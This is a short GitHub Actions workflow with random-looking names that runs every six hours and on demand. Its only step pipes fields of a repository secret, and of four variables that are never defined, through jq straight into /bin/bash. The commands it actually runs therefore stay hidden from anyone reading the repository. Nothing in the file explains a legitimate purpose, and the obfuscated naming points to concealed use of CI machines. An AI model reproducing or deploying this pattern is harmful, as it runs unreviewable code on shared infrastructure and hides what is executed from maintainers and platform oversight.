name: zhaojinan7890

on:
  workflow_dispatch:
  schedule:
    - cron: '5 5/6 * * *'
jobs:  # 18644
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaojinan7890
        env:
          kkkt42721: ${{ secrets.kkkt42721 }}
        run: |
          echo $kkkt42721 | jq -r .edah53 | /bin/bash
          echo $zpvc40 | jq -r .rred39 | /bin/bash
          echo $trx46 | jq -r .fgay7853 | /bin/bash
          echo $hpmi834 | jq -r .wam68181 | /bin/bash
          echo $objwb10 | jq -r .dhxly78 | /bin/bash

